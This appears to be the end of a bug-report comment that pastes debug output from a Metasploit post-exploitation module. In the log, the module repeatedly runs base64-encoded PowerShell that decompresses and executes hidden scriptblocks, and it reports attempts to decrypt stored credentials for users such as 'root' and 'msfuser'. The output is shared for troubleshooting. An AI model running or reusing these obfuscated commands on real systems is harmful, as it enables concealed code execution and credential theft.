AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHUATwB2AFcAcgBuAGYAVwAnADsA -InputFormat None
[+] Cleaning up 11736
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMAewAwAH0AQQBGAGQAJwArACcAZQB2AEcATQBDACcAKwAnAEEANAB0ADIAegBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwA0AG0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAcwB4AEwAVgAzAEMAcwB5AEgAQQBwAHEAdgBSADIAcgAxAEcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQB7ADEAfQBUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBiAG4AQgBsAEcANABRAEEAQQBBAEEAPQAnACkALQBmACcASQAnACwAJwA4ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwB1AE8AdgBXAHIAbgBmAFcAJwA7AA== -InputFormat None
[!] ID B5EBAF50-1A63-4C48-839F-5F8A5452520B username 'root' decrypted Password nil, excluding
[+] Compressed size: 2192
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAaABlAHYARwBNACcAKwAnAEMAQQB6AFcAUgB3AFgASwBxAE0AQgBSAEEAZgA0AFYARgB7ADEAfQA2AHoAVABGAG4AMQBUAFkAVwB4AGQASgBSAEUAVQBFAFYAcwBLADEARgBLAG4AQwA0AFEAVQA0AGkATQBKAEoAawBGAE0AdgA3ADUAJwArACcAcQAyADIAegB1AHoATABuAG4AMwBFADEAdwBYAG4ARgBEAE8AMgBEACcAKwAnAHgARgBOAFQAJwArACcAQgBCAEIAVABGAFgAYQB3AGIAYgBOAHcAQgBLAFQASABkADEAbgBxAFYAVQBXAHgARQBXAGkAcABNAHoAUQBqAG4AcgBTAEIASwBUAHoAWQB4AFAAaQByAFQAWQBUAGsAdgBDAEMAcwAvAEgAaAA5AEIAaABEAHoAUABuAEcARQBWAEsAWABFAGkAMQA1AHMALwAxAFUAUgBDAE4ANABxAFgASQBtAHMAcQBiAFQANABMAHIAbgBDAHUAYwBEAEgATgBWAEgAYgBLAEUAdABiADgAawBPAHMATgA0AHUAeQBBAGgAVABwAEIAVgAzAEEASwBNADQAbgB0ADAAZQArAHgASABnAGcAQgBBAEMAcwBVAHMARwBJAE0AMwBjAEoANQAyAGMAMAA1ADYASgB3AEIAcQBtADgAawBQAEcAMQBBAG0AaQBhAGYARAB5AFUASgBGADQAbgB0AFMAagBnAFkAYwBRAGgANAAyADUAMABqAGcATQBEAFAAQwA5AC8ATAA4ADMARAArAHkATABGAHgAaQArAEkAKwBZAGsATwB5AGYAeQA3AHsAMgB9AHIAcgBOADUAYQAvAEUAdQBIAHQATgB0AHgAZgB6ADEAbwByAHEAeAB5AEgAaAAvAC8AOABWAHQAMwBWADMAOABwADAAcwBPAHYATgA4AGUAYgBRAGQAKwBlAEUAagBxADAASgB7ADIAfQArAHAAbQA2ACsAaABGAE0ANAB0AEYAbwB2ADYAawBKAEYAcABKADUAewAxAH0AcgAzADcAMgBiAHoAcABLACcAKwAnAG4AWQByAHMAbwA3AE0AUABoAC8ALwB0AG8AKwBYAGgAMgBQAGYAZgA2AEYAeQBIAGoATQAwAEcAeAA1AFQAQwB7ADEAfQBVADMAdwBTADQASQBFAFAAVAB5AGsAZQBhAEoAMwBhADgAOQBKAEwAJwArACcAcgA0ADkATAB3AEsAYQB1ADYAOQB1AFAAQwArAHIAWAB2AC8AVwB1AEYAcQAxAGQAWAAxAHIAOQBKAFkAOAB6ACsAbwBnAHkAeQB2AEMAYwBLAC8AZgBuAHgAagA0AC8ASQBHAGUAawBCADUAZABTAC8AUQBOAHUAeQBwAGQAewAyAH0AOAA0AEIAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAWgAnACwAJwBsACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwByAEsAdQBxAFAATABVAGkAJwA7AA==
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAaABlAHYARwBNACcAKwAnAEMAQQB6AFcAUgB3AFgASwBxAE0AQgBSAEEAZgA0AFYARgB7ADEAfQA2AHoAVABGAG4AMQBUAFkAVwB4AGQASgBSAEUAVQBFAFYAcwBLADEARgBLAG4AQwA0AFEAVQA0AGkATQBKAEoAawBGAE0AdgA3ADUAJwArACcAcQAyADIAegB1AHoATABuAG4AMwBFADEAdwBYAG4ARgBEAE8AMgBEACcAKwAnAHgARgBOAFQAJwArACcAQgBCAEIAVABGAFgAYQB3AGIAYgBOAHcAQgBLAFQASABkADEAbgBxAFYAVQBXAHgARQBXAGkAcABNAHoAUQBqAG4AcgBTAEIASwBUAHoAWQB4AFAAaQByAFQAWQBUAGsAdgBDAEMAcwAvAEgAaAA5AEIAaABEAHoAUABuAEcARQBWAEsAWABFAGkAMQA1AHMALwAxAFUAUgBDAE4ANABxAFgASQBtAHMAcQBiAFQANABMAHIAbgBDAHUAYwBEAEgATgBWAEgAYgBLAEUAdABiADgAawBPAHMATgA0AHUAeQBBAGgAVABwAEIAVgAzAEEASwBNADQAbgB0ADAAZQArAHgASABnAGcAQgBBAEMAcwBVAHMARwBJAE0AMwBjAEoANQAyAGMAMAA1ADYASgB3AEIAcQBtADgAawBQAEcAMQBBAG0AaQBhAGYARAB5AFUASgBGADQAbgB0AFMAagBnAFkAYwBRAGgANAAyADUAMABqAGcATQBEAFAAQwA5AC8ATAA4ADMARAArAHkATABGAHgAaQArAEkAKwBZAGsATwB5AGYAeQA3AHsAMgB9AHIAcgBOADUAYQAvAEUAdQBIAHQATgB0AHgAZgB6ADEAbwByAHEAeAB5AEgAaAAvAC8AOABWAHQAMwBWADMAOABwADAAcwBPAHYATgA4AGUAYgBRAGQAKwBlAEUAagBxADAASgB7ADIAfQArAHAAbQA2ACsAaABGAE0ANAB0AEYAbwB2ADYAawBKAEYAcABKADUAewAxAH0AcgAzADcAMgBiAHoAcABLACcAKwAnAG4AWQByAHMAbwA3AE0AUABoAC8ALwB0AG8AKwBYAGgAMgBQAGYAZgA2AEYAeQBIAGoATQAwAEcAeAA1AFQAQwB7ADEAfQBVADMAdwBTADQASQBFAFAAVAB5AGsAZQBhAEoAMwBhADgAOQBKAEwAJwArACcAcgA0ADkATAB3AEsAYQB1ADYAOQB1AFAAQwArAHIAWAB2AC8AVwB1AEYAcQAxAGQAWAAxAHIAOQBKAFkAOAB6ACsAbwBnAHkAeQB2AEMAYwBLAC8AZgBuAHgAagA0AC8ASQBHAGUAawBCADUAZABTAC8AUQBOAHUAeQBwAGQAewAyAH0AOAA0AEIAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAWgAnACwAJwBsACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwByAEsAdQBxAFAATABVAGkAJwA7AA== -InputFormat None
[+] Cleaning up 7008
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAdABlAHYARwBNAEMAQQAnACsAJwA0AHQAMgB6AFMAdgBMAEwATQByAFAAeQAwADMATgBLADQAbQAxAHMAbgBKAFAATABVAEUAUwBDAEUAcwBzAHkAawB4AE0AJwArACcAeQBrAGsAdAAxAGwAQQBQAEwAVQA0AHQAVQB0AGYAVQB5ADAANgB0AEwASwA0AEoAVABzADEASgBUAFMANwBSAEQAUwA0AHAAeQBzAHgATABWADMARAAwAGkAQwBvAHIAeQBVAG4AUAByAGwARwB0AGoAawBZADEATABCAGkAcgBZAFIAbwBxADgAVABvAHEAZQBhAFUAewAxAH0AewAwAH0AVABwAFEAUQAyAHMAQgBvAFoASQBiADAASQBRAEEAQQBBAEEAPQAnACkALQBmACcATwAnACwAJwA1ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwByAEsAdQBxAFAATABVAGkAJwA7AA== -InputFormat None
[!] ID 484D83CA-09A3-4FBB-B8BE-66A9217B9D2F username 'msfuser' decrypted Password nil, excluding
[+] Compressed size: 2216
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAeABlAHYARwBNAEMAQQB6AFcAUgBYAFcAKwBxAFEAQgBDAEcALwB3AG8AWABUAGEAeQB4AGcAbAByAEEAMAAzAHEAMQB5ADQAZABGAEsAeAA1AEYAVwBzAEcAYwBpAHkAMgBNAGkAQQBkADIAQwBiAHUASQAyADEAOQBmAHIAZQAzAGMAVABQAEwATQArADAAdwBtAEcAVQBnAE8AVABNAGwAdwBuAEQAdQBMADUAWABxAEMAMAByACcAKwAnAFMALwB7ADMAfQBSAFUAbwBmAGMAUQA1AGwAQgArAEYAOQBFAHsAMwB9AEoAUwBpAEMANQBnAEYASQBOAEkARwBuAHEAWABNAGoASgBiAGcATgBuAG8AVABvADAAWQBXAGwATwBzADMALwBQAHoAeQBpAHcAUABFACsAZAAnACsAJwBnAGcAaABFAGYAUwBIADMAdQA5ACsAbwBhAHQAVwB5AEUAaQB5AHIAUwBYAFcAUQA2AHQAKwBhAEMAVQBnAEUAcABEAFkAUgA1AEsASwBGAHQATABxAFIAKwA1ADMARgA2AEEAbABxAGMAWQBGAHUAegBVAHAATQBPAEoAagA2AHoAewAyAH0ASQBPAFcAaQBHAEUAZgBHAHQAQgAwAHoALwBZAFQAWgAzADEAOABZAFcAaAAxAHQARwBzAG8AcwBmAHgAWgBZAEsAaQBLAE4AdwAvAFoAZgBsAHEARgBwAG8AdQB4ADUAcgBPAE0ARwBKAE4AZQA1AFcAUQBoAFcANgAxAGkAcgBOAHIAYwAzADYASQB7ADIAfQBlAG4AbgBjAFgAUAAnACsAJwBRAEsAcgBvADAATgAzAEoAZwBOAHQAUAB3AEgARgB0AGEAYQAxAEIAMABIAEEAeABOAE8AZAByAHYAZQAxAHUANQBqAGYAUAAyAC8AOAAxAGYAZgB1AHYASQArAC8AVwBmAGUATQB0ADkAagBNAEYATQByAEMARQBIAHEAbQBNADkAbQBHAHUAbAAxACcAKwAnAGcAcgB3AEgAMABjAGUAcwBjAEkAcABFAGIAUABJAEgAcgAzADEAOABtAHMAZQBnADAARQBpAGcAdwBSAG4AUwBnAGUARwA0AGEASwAnACsAJwAxAFcAVwAvAEcASgAzADAAZQA1ACsANQBwAGEATgBzAEIAWAA1AGEAUAB4AC8ATABqAEwAYgBPAHgAOAAzADMAMgAvAFAAUAA5AFoARABqAEoASwBuAG8AWgBOADIARwBuACsANgBEAGMAKwBVADEAUgBQAEMAaQBkAHsAMAB9ADUAYQBRAFkAewAzAH0ARwBTAFEAMAA2AGgAMAArADEATwBGACcAKwAnAEwAZwArAEUASAA5AHUAMgB6ADMAegBaAGwAKwBsAHMAOQBGAFgAegBnAEUAQQBBAEEAewAxAH0AewAxAH0AJwApAC0AZgAnAFYAJwAsACcAPQAnACwAJwA3ACcALAAnAGsAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHkAbwBrAFgAWgBRAGkAbQAnADsA
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAeABlAHYARwBNAEMAQQB6AFcAUgBYAFcAKwBxAFEAQgBDAEcALwB3AG8AWABUAGEAeQB4AGcAbAByAEEAMAAzAHEAMQB5ADQAZABGAEsAeAA1AEYAVwBzAEcAYwBpAHkAMgBNAGkAQQBkADIAQwBiAHUASQAyADEAOQBmAHIAZQAzAGMAVABQAEwATQArADAAdwBtAEcAVQBnAE8AVABNAGwAdwBuAEQAdQBMADUAWABxAEMAMAByACcAKwAnAFMALwB7ADMAfQBSAFUAbwBmAGMAUQA1AGwAQgArAEYAOQBFAHsAMwB9AEoAUwBpAEMANQBnAEYASQBOAEkARwBuAHEAWABNAGoASgBiAGcATgBuAG8AVABvADAAWQBXAGwATwBzADMALwBQAHoAeQBpAHcAUABFACsAZAAnACsAJwBnAGcAaABFAGYAUwBIADMAdQA5ACsAbwBhAHQAVwB5AEUAaQB5AHIAUwBYAFcAUQA2AHQAKwBhAEMAVQBnAEUAcABEAFkAUgA1AEsASwBGAHQATABxAFIAKwA1ADMARgA2AEEAbABxAGMAWQBGAHUAegBVAHAATQBPAEoAagA2AHoAewAyAH0ASQBPAFcAaQBHAEUAZgBHAHQAQgAwAHoALwBZAFQAWgAzADEAOABZAFcAaAAxAHQARwBzAG8AcwBmAHgAWgBZAEsAaQBLAE4AdwAvAFoAZgBsAHEARgBwAG8AdQB4ADUAcgBPAE0ARwBKAE4AZQA1AFcAUQBoAFcANgAxAGkAcgBOAHIAYwAzADYASQB7ADIAfQBlAG4AbgBjAFgAUAAnACsAJwBRAEsAcgBvADAATgAzAEoAZwBOAHQAUAB3AEgARgB0AGEAYQAxAEIAMABIAEEAeABOAE8AZAByAHYAZQAxAHUANQBqAGYAUAAyAC8AOAAxAGYAZgB1AHYASQArAC8AVwBmAGUATQB0ADkAagBNAEYATQByAEMARQBIAHEAbQBNADkAbQBHAHUAbAAxACcAKwAnAGcAcgB3AEgAMABjAGUAcwBjAEkAcABFAGIAUABJAEgAcgAzADEAOABtAHMAZQBnADAARQBpAGcAdwBSAG4AUwBnAGUARwA0AGEASwAnACsAJwAxAFcAVwAvAEcASgAzADAAZQA1ACsANQBwAGEATgBzAEIAWAA1AGEAUAB4AC8ATABqAEwAYgBPAHgAOAAzADMAMgAvAFAAUAA5AFoARABqAEoASwBuAG8AWgBOADIARwBuACsANgBEAGMAKwBVADEAUgBQAEMAaQBkAHsAMAB9ADUAYQBRAFkAewAzAH0ARwBTAFEAMAA2AGgAMAArADEATwBGACcAKwAnAEwAZwArAEUASAA5AHUAMgB6ADMAegBaAGwAKwBsAHMAOQBGAFgAegBnAEUAQQBBAEEAewAxAH0AewAxAH0AJwApAC0AZgAnAFYAJwAsACcAPQAnACwAJwA3ACcALAAnAGsAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAHkAbwBrAFgAWgBRAGkAbQAnADsA -InputFormat None
[+] Cleaning up 8620
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAewAwAH0ANABzAEkAQQBGADkAZQB2AEcATQBDAEEANAB0ADIAegBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwA0AG0AMQBzAG4ASgBQAEwAJwArACcAVQAnACsAJwBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQB7ADEAfQBBAFAATABVADQAdABVAHQAZgBVAHkAMAA2AHQATABLADQASgBUAHMAMQBKAFQAUwA3AFIARABTADQAcAB5AHMAeABMAFYAOABoAEoAOAAzAEIAegA5AFgAUgBQAHIAVgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBRAFoASwBEAEMASQBRAEEAQQBBAEEAPQAnACkALQBmACcASAAnACwAJwBsACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwB5AG8AawBYAFoAUQBpAG0AJwA7AA== -InputFormat None
[!] ID E379DED2-8DAE-4B9A-B77D-7ED99E8C7152 username 'root' decrypted Password nil, excluding
[!] ID FD0041D1-4A68-4ABD-AEFE-B2BF02BB7CA9 Password column nil, excluding
[-] Post aborted due to failure: no-target: No rows could be processed
[*] Post module execution completed


```

</p>

</details>

Thanks for following up on this, hopefully we can get this all sorted out 🤞